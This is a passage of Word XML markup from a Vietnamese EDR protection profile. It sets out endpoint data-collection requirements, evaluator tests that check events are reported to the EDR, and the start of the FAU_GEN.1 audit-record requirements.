        <w:t xml:space="preserve"> các tệp</w:t>
      </w:r>
      <w:r w:rsidR="004769FD" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>] đư</w:t>
      </w:r>
      <w:r w:rsidR="004769FD" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ợc lưu trữ liên tục.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4BE35F" w14:textId="0FDC1E5D" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="004769FD" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">f. </w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00087086" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D70AF" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chỉ định</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dữ liệu máy chủ khác</w:t>
      </w:r>
      <w:r w:rsidR="00087086" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205EAEEC" w14:textId="5761866F" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lưu ý áp dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Mục đích của yêu cầu này là chỉ định tập hợp dữ liệu điểm cuối tối thiểu mà EDR phải có khả năng thu thập. Việc kiểm tra có thể bỏ qua một mục hoặc nhiều mục.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B694D6D" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hoạt động đánh giá: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8421"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="7A20B05A" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41CC498E" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hoạt động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="552EA945" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hoạt động đảm bảo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="2862E095" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="531A694D" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37468B83" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá viên phải xác minh tất cả các loại dữ liệu sự kiện điểm cuối hỗ trợ được mô tả.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="1293F9CC" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="744E6C3F" w14:textId="3D84D34D" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00DE3774" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hướng dẫn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F9BAEF5" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá viên phải xem xét hướng dẫn hoạt động và xác định TSS liệt kê tất cả các loại dữ liệu sự kiện điểm cuối có thể thu thập được.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="17B0E575" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51E2C646" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03DD49FE" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá viên thực hiện các bài kiểm tra sau:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B6C5197" w14:textId="6AA6F088" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 1</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Đánh giá viên phải xác minh phiên bản </w:t>
            </w:r>
            <w:r w:rsidR="00204C5F">
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>hệ điều hành</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, kiến trúc và địa chỉ IP của hệ thống do máy chủ trung gian quản lý so với dữ liệu được báo cáo cho EDR.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6582F029" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 2</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Đánh giá viên phải đăng nhập vào một hệ thống được quản lý bởi máy chủ trung gian với hai tài khoản riêng biệt và xác minh rằng hoạt động được báo cáo chính xác cho EDR.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B443AB8" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 3</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Đánh giá viên sẽ chạy một ứng dụng người dùng đã biết được cung cấp trên HĐH nền tảng và xác minh rằng việc tạo quy trình và tải mô-đun tiếp theo được báo cáo chính xác cho EDR.  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="338D9F47" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 4:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải khởi tạo một tài liệu rỗng mới trong kho lưu trữ liên tục và xác minh rằng hoạt động được báo cáo chính xác cho EDR.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B243923" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Thử nghiệm 5</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="notranslate"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Đánh giá viên phải thực hiện một hành động gây ra một sự kiện xảy ra cho tất cả các mục trong nhiệm vụ và xác minh hoạt động được báo cáo  cho EDR.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="785F8900" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>9.3.1.3 FAU_GEN.1/EDR Tạo dữ liệu kiểm tra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0417BA7E" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FAU_GEN.1.1/EDR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5A200F" w14:textId="0FB68171" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tinh chỉnh</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: EDR sẽ tạo hồ sơ kiểm toán về các sự kiện có thể kiểm toán sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258CA057" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a. Tất cả các sự kiện có thể kiểm toán cho [mức độ không được chỉ định];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEFE89F" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>b. Hoạt động đăng nhập giao diện quản trị EDR;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BBEC62" w14:textId="33775FE5" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>c. Lệnh khắc phục được gửi đến tác nhân máy chủ, điểm cuối hoặc hệ thống thiết bị mạng</w:t>
      </w:r>
      <w:r w:rsidR="00087086" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> bị ảnh hưởng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68685686" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>d. Thay đổi cấu hình EDR;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CC3451" w14:textId="389409A7" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e. [</w:t>
      </w:r>
      <w:r w:rsidR="00087086" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004769FD" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00087086" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hỉ định</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Các sự kiện có thể kiểm toán khác</w:t>
      </w:r>
      <w:r w:rsidR="00087086" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FFAE8B" w14:textId="1E330306" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lưu ý áp dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Mục đích của yêu cầu này là chỉ định tập hợp tối thiểu các bản ghi Thử nghiệm được tạo ra về các hành động trên EDR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD7B6EE" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FAU_GEN.1.2/EDR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A919749" w14:textId="038BFB01" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tinh chỉnh: </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EDR sẽ ghi lại</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong mỗi hồ sơ kiểm toán ít nhất là các thông tin sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E65A8A7" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a. Ngày và giờ diễn ra sự kiện,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D040668" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>b. Loại sự kiện,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E768173" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>c. Danh tính đối tượng,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6350DF0F" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>d. Kết quả (thành công hay thất bại) của sự kiện,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308A2AD3" w14:textId="44E4980D" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e. Đối với mỗi loại kiểm toán, dựa trên các định nghĩa sự kiện có thể kiểm toán của các thành phần chức năng có trong PP / ST, [</w:t>
      </w:r>
      <w:r w:rsidR="00B109FE" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
